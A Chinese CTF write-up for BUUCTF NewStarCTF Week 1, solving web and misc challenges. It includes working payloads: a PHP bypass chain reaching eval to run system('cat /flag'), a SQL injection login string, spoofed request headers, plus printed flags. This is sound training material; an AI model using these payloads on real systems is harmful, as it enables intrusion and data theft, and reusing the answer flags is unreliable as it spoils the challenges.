文章目录

  • WEEK1
  • WEB
  • HTTP
  • Head?Header!
  • 我真的会谢
  • NotPHP
  • Word-For-You
  • MISC
  • Yesec no drumsticks 1
  • qsdz's girlfriend 1
  • Look my eyes
  • EzSnake
  • 奇怪的音频


WEEK1

WEB

HTTP

第一关

Please `GET` me your `name`,I will tell you more things.

传个GET参数即可:?name=mochu7

第二关

Hello,mochu7. Please `POST` me the `key` Again.But Where is the key?

源码中有注释:<!--Key: ctfisgood-->

传个POST参数:key=ctfisgood

第三关

You are smart but you are not `admin`.

源码注释:<!--Check something-->

BUUCTF NewStarCTF 公开赛赛道Week1 Writeup_BUU NewStarCTF

修改一下Cookie

BUUCTF NewStarCTF 公开赛赛道Week1 Writeup_HTTP_02

Head?Header!

第一关

Must Use `CTF` Brower!

User-Agent: CTF

第二关

Must From `ctf.com`

Referer: ctf.com

第三关

Only Local User Can Get Flag

X-Forwarded-For: 127.0.0.1

BUUCTF NewStarCTF 公开赛赛道Week1 Writeup_HTTP_03

我真的会谢

BUUCTF NewStarCTF 公开赛赛道Week1 Writeup_BUU NewStarCTF_04


第一部分:robots.txt

BUUCTF NewStarCTF 公开赛赛道Week1 Writeup_php_05


第二部分:index.php.swp

BUUCTF NewStarCTF 公开赛赛道Week1 Writeup_php_06

BUUCTF NewStarCTF 公开赛赛道Week1 Writeup_BUU NewStarCTF_07


第三部分:www.zip

BUUCTF NewStarCTF 公开赛赛道Week1 Writeup_php_08

NotPHP

<?php
error_reporting(0);
highlight_file(__FILE__);
if(file_get_contents($_GET['data']) == "Welcome to CTF"){
    if(md5($_GET['key1']) === md5($_GET['key2']) && $_GET['key1'] !== $_GET['key2']){
        if(!is_numeric($_POST['num']) && intval($_POST['num']) == 2077){
            echo "Hack Me";
            eval("#".$_GET['cmd']);
        }else{
            die("Number error!");
        }
    }else{
        die("Wrong Key!");
    }
}else{
    die("Pass it!");
}

file_get_contents($_GET['data']) == "Welcome to CTF"可使用的伪协议有

php://inputdata://text/plain;base64,xxx

这里为了后面的绕过只能选择data://伪协议

md5($_GET['key1']) === md5($_GET['key2']) && $_GET['key1'] !== $_GET['key2']的绕过参

!is_numeric($_POST['num']) && intval($_POST['num']) == 2077的绕过可以使用2077x或者2077%00

BUUCTF NewStarCTF 公开赛赛道Week1 Writeup_BUU NewStarCTF_09

/?data=data://text/plain;base64,V2VsY29tZSB0byBDVEY=&key1[]=1&key2[]=2&cmd=%0asystem("cat /flag");

num=2077a

Word-For-You

描述

赛博顶针先生悄悄把flag告诉了Mr.H,Mr.H为了确保安全把flag放到了数据库中,你能找到吗?

万能密码
payload: NewCTFer'or '1'='1

BUUCTF NewStarCTF 公开赛赛道Week1 Writeup_php_10

MISC

Yesec no drumsticks 1

无密码LSBstegsolve一把梭

BUUCTF NewStarCTF 公开赛赛道Week1 Writeup_php_11

qsdz’s girlfriend 1

描述:我失忆了,这是我在我桌面上发现的压缩包,可是我忘记了压缩包密码了...请问你能帮助我找到我女朋友的名字吗?flag格式为:flag{女朋友名字_女朋友生日}

BUUCTF NewStarCTF 公开赛赛道Week1 Writeup_BUU NewStarCTF_12

生日一般都是八位纯数字

BUUCTF NewStarCTF 公开赛赛道Week1 Writeup_php_13


图片末尾有一段hint的base64

My girlfriend's name has six letters and the first letter is capitalized

Google识图

BUUCTF NewStarCTF 公开赛赛道Week1 Writeup_HTTP_14

Look my eyes

根据题目名称使用SilentEye,默认密码

BUUCTF NewStarCTF 公开赛赛道Week1 Writeup_BUU NewStarCTF_15

PS C:\Users\Administrator> php -r "var_dump(base64_decode('ZmxhZ3tMMG9rX20zXzFuX215X2V5M3N9'));"
Command line code:1:
string(24) "flag{L0ok_m3_1n_my_ey3s}"

EzSnake

达到114分即可获得一个一个一个一个flag

EzSnake.jar使用jd-gui打开,寻找关键字114

BUUCTF NewStarCTF 公开赛赛道Week1 Writeup_php_16


BUUCTF NewStarCTF 公开赛赛道Week1 Writeup_HTTP_17


发现这里对/statics/1919810/114514文件有异或操作,将.jar文件修改后缀为.zip然后解压,得到114514

with open('114514', 'rb') as f1:
	with open('flag', 'wb') as f2:
		for d in f1.read():
			d = '{:02x}'.format(d^0x58)
			f2.write(bytes.fromhex(d))

异或处理后得到flag文件为png文件


补二维码定位符即可正常扫描

>>> from base64 import *
>>> b64decode('ZmxhZ3tZMHVfNHJlXzBuZV9vTmVfMG5FX3N0NFJ9=')
b'flag{Y0u_4re_0ne_oNe_0nE_st4R}'

奇怪的音频

BUUCTF NewStarCTF 公开赛赛道Week1 Writeup_php_18

BUUCTF NewStarCTF 公开赛赛道Week1 Writeup_php_19